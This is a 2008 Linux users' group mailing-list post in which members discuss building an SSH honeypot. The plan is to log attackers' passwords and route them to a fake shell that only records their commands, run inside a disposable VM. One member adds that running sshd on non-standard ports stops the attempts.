On 1/23/2008 9:13 PM, David Brown wrote:
On Wed, Jan 23, 2008 at 06:27:33PM -0800, James G. Sack (jim) wrote:
So, a "fake shell prompt" is maybe a little like a honeypot, except that
commands get logged but not executed?
Depends on how much I want to find out. Most likely, it is something being
scripted on their end, so I could see what it does, and start coding up
stuff that looked more an more like what it was looking for. It is
probably looking for programs with known root exploits.
If so, how would you go about doing that?
Hmm. Well, it'd be running inside of a VM, just so I could blow it all
away when I was done.
I'd build ssh from source, and start by logging the passwords they were
trying. Then I'd hack the ssh run accept their logins, but have it invoke
my special shell instead of a normal shell. It would print a shell prompt,
but then just log. Depending on how ambitious I got, I could parse their
commands and start faking those programs as well. Then do reading to see
if I could find out about the explots, and make sure that my real machines
were current enough.
I'm running all my sshd on non-standard ports and I get no attempts
against it. Looks like I'm missing out on all the fun.
Karl
--
[email protected]
http://www.kernel-panic.org/cgi-bin/mailman/listinfo/kplug-list
